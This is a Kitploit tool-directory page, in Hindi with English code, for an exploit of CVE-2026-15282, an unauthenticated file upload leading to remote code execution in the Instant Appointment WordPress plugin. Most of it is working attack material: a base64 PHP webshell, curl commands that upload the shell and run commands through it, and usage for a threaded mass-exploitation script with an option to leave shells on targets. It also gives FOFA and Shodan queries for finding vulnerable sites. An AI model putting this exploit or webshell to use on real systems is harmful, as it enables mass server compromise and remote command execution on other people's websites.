Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-15282 — Instant Appointment <= 1.2 — add_service_front AJAX के माध्यम से बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड से RCE | CVSS 9.8 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-15282
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubshinthink/cve-2026-15282

CVE-2026-15282

Instant Appointment <= 1.2 — add_service_front AJAX के माध्यम से बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड से RCE | CVSS 9.8

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-15282 — Instant Appointment मास RCE एक्सप्लॉइट

प्री-ऑथ file_get_contents() + file_put_contents() → PHP वेबशेल


अवलोकन

CVE-2026-15282 Instant Appointment WordPress प्लगइन (≤ 1.2) में एक गंभीर (CVSS 9.8) बिना प्रमाणीकरण वाली मनमानी फ़ाइल अपलोड भेद्यता है।

add_service_front AJAX एक्शन बिना प्रमाणीकरण वाली पहुँच के लिए wp_ajax_nopriv_ के माध्यम से पंजीकृत होता है। हैंडलर उपयोगकर्ता-आपूर्ति image_url और image_name को बिना किसी फ़ाइल प्रकार या एक्सटेंशन सत्यापन के सीधे file_get_contents() और file_put_contents() में पास करता है।

प्रभावित संस्करण

संस्करणस्थिति
≤ 1.2असुरक्षित
> 1.2कोई पैच उपलब्ध नहीं — प्लगइन हटाएँ

भेद्यता तंत्र

मूल कारण

root@kitploit:~
// ajax_services.php
function insapp_upload_image_as_attachment($image_url, $file_name, $product_id) {
    $image_data = file_get_contents($image_url);       // downloads from ANY URL
    $file = $upload_dir['path'] . '/' . $file_name;    // uses attacker's filename
    file_put_contents($file, $image_data);             // no extension check!
}

AJAX हैंडलर किसी भी image_url (जिसमें data:// URI शामिल हैं) को स्वीकार करता है और किसी भी image_name को सीधे WordPress अपलोड निर्देशिका में लिखता है।

आक्रमण प्रवाह

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=add_service_front
  image_url=data://text/plain;base64,PD9waHAgc3lzdGVt...
  image_name=think_xxx.php
→ PHP webshell written to wp-content/uploads/YYYY/MM/think_xxx.php
→ RCE via https://target.com/wp-content/uploads/YYYY/MM/think_xxx.php?c=id

स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-15282.git
cd CVE-2026-15282
pip install -r requirements.txt

उपयोग

root@kitploit:~
python cve_2026_15282.py -t target.com
python cve_2026_15282.py -f targets.txt -o shells.txt
python cve_2026_15282.py -t target.com --debug
python cve_2026_15282.py -t target.com --no-cleanup

आर्ग्युमेंट्स

root@kitploit:~
  -t, --target      Single target
  -f, --file        Target list
  -o, --output      Save RCE URLs to file
  --threads         Workers (default: 25)
  --no-cleanup      Leave shells on target
  --debug           Show every request
  -v, --verbose     Verbose output

प्रूफ ऑफ कॉन्सेप्ट

एकल लक्ष्य

root@kitploit:~
$ python cve_2026_15282.py -t target.com
root@kitploit:~
  ⠋ Scanning target...  →  OK Scanning target...

  Host       : target.com
  Plugin     : YES
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/2026/07/think_a1b2c3.php?c=id
  Output     : uid=33(www-data) gid=33(www-data)

मास स्कैन

root@kitploit:~
  [.] current-target.com | ⠋ [████░░░░░░░░░░░░░] 45/500 (9%) Plugin:12 UP:3 RCE:1
  [RCE] target.com   https://target.com/wp-content/uploads/2026/07/think_xxx.php

मैन्युअल शोषण

root@kitploit:~
# 1. Create base64-encoded PHP shell
echo '<?php system($_GET["c"]); ?>' | base64 -w0

# 2. Upload via AJAX
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=add_service_front' \
  -d 'service_name=test' \
  -d 'image_url=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==' \
  -d 'image_name=shell.php' \
  -d 'image_size=100' \
  -d 'image_type=image/jpeg' \
  -d 'service_price_sale=1' \
  -d 'service_price_reg=1' \
  -d 'service_category[]=1' \
  -d 'service_duration=60' \
  -d 'service_author=1'

# 3. Access shell
curl -sk 'https://target.com/wp-content/uploads/2026/07/shell.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="wp-content/plugins/instant-appointment"
Shodan: http.html:"instant-appointment"

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।


संदर्भ

संसाधनलिंक
WPScan

tenteeglobal या Instant Appointment से संबद्ध नहीं है।

टूल डाउनलोड करें
wpscan.com/vulnerability/b3457e95
Wordfencewordfence.com
NVDCVE-2026-15282
शोधकर्ताRandom Robbie (What Security)